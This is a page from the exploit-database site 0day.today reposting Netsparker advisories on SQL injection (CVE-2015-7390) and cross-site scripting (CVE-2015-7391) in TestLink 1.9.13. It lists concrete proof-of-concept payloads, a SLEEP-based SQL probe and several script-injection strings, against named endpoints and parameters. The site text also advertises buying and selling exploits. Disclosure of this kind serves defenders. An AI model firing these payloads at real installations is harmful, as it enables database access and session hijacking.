0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TestLink 1.9.13 Cross Site Scripting / SQL Injection Vulnerabilities
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Information -------------------- Advisory by Netsparker. Name: SQL Injection Vulnerability in TestLink 1.9.13 Affected Software : TestLink Affected Versions: 1.9.1.3 and possibly below Vendor Homepage : http://testlink.org/ Vulnerability Type : SQL Injection Severity : Critical Status : Fixed CVE-ID : CVE-2015-7390 Netsparker Advisory Reference : NS-15-015 Description -------------------- If your web application is vulnerable to SQL injection, a hacker is able to execute any malicious SQL query or command through the web application. Technical Details -------------------- Proof of Concept URLs for SQL Injection vulnerability in TestLink: Page: lnl.php Parameter Name: apikey Parameter Type: GET Attack Pattern: '+(SELECT 1 FROM (SELECT SLEEP(25))A)+' For more information on SQL Injection vulnerabilities read the following article: https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/sql-injection/ Information -------------------- Advisory by Netsparker. Name: Multiple XSS Vulnerabilities in TestLink 1.9.13 Affected Software : TestLink Affected Versions: 1.9.1.3 and possibly below Vendor Homepage : http://testlink.org/ Vulnerability Type : Cross-site Scripting Severity : Important Status : Fixed CVE-ID : CVE-2015-7391 Netsparker Advisory Reference : NS-15-016 Description -------------------- By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session. This means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. As seen from the XSS example in this article, if a web application is vulnerable to cross-site scripting and the administrator’s session is hijacked, the malicious hacker exploiting the vulnerability will have full admin privileges on that web application. Technical Details -------------------- Proof of Concept URLs for XSS in TestLink 1.9.13: /testlink-code-1.9.13/lib/results/tcCreatedPerUserOnTestProject.php Parameter Name selected_end_date Parameter Type POST Attack Pattern '"--></style></scRipt><scRipt>alert(0x008360)</scRipt> /testlink-code-1.9.13/lib/results/tcCreatedPerUserOnTestProject.php Parameter Name selected_start_date Parameter Type POST Attack Pattern '"--></style></scRipt><scRipt>alert(0x007F5A)</scRipt> /testlink-code-1.9.13/lib/testcases/containerEdit.php Parameter Name containerType Parameter Type POST Attack Pattern '"--></style></scRipt><scRipt>alert(0x0053E8)</scRipt> /testlink-code-1.9.13/lib/testcases/listTestCases.php?feature=edit_tc Parameter Name filter_tc_id Parameter Type POST Attack Pattern "><body onload=alert(9)> /testlink-code-1.9.13/lib/testcases/listTestCases.php?feature=edit_tc Parameter Name filter_testcase_name Parameter Type POST Attack Pattern '"--></style></scRipt><scRipt>alert(0x0050D4)</scRipt> /testlink-code-1.9.13/lib/testcases/tcImport.php?containerID=2&bIntoProject=1&useRecursion='"--></style></scRipt><scRipt>alert(0x004898)</scRipt> Parameter Name useRecursion Parameter Type GET Attack Pattern '"--></style></scRipt><scRipt>alert(0x004898)</scRipt> /testlink-code-1.9.13/lib/testcases/tcSearch.php Parameter Name targetTestCase Parameter Type POST Attack Pattern "><body onload=alert(9)> /testlink-code-1.9.13/lib/testcases/tcSearch.php Parameter Name created_by Parameter Type POST Attack Pattern "><scRipt>alert(9)</scRipt> /testlink-code-1.9.13/third_party/user_contribution/fakeRemoteExecServer/client4fakeXMLRPCTestRunner.php Parameter Name Referer Parameter Type HTTP Header Attack Pattern '"--></style></scRipt><scRipt>alert(0x00FF1E)</scRipt> For more information on cross-site scripting vulnerabilities read the following article: https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/cross-site-scripting-xss/ # 0day.today [2024-11-15] #